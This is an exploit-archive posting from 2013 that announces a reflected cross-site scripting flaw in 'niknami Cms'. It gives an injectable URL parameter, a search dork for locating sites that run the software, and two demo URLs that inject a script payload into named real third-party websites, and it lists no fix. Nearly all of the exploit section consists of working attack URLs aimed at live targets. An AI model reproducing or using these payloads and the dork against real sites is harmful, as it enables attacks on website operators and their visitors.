niknami Cms Cross-Site Scripting Vulnerabilities
2013-08-22 17:49:21Posted by: irist.ir
#################################
# Iranian Exploit DataBase Forum
# http://iedb.ir/acc
# http://iedb.ir
#################################
# Exploit Title : niknami Cms Cross-Site Scripting Vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : [email protected]
# Home : http://iedb.ir - http://iedb.ir/acc
# Software Link : http://www.niknami.ir/
# Security Risk : High
# Tested on : Linux
# Dork : "Design: Niknami.ir"
#################################
# Exploit :
# http://www.Site.com/show.php?page=newbooks&id=[Xss]
# Dem0 :
# http://15khordad42.ir/show.php?page=newbooks&id=202"><script>alert(/IeDb.Ir/)</script>
# http://www.oral-history.ir/show.php?page=newbooks&id=202"><script>alert(/IeDb.Ir/)</script>
#################################
# Exploit Archive = http://www.iedb.ir/exploits-400.html
#################################
Fixes
No fixesIn order to submit a new fix you need to be registered.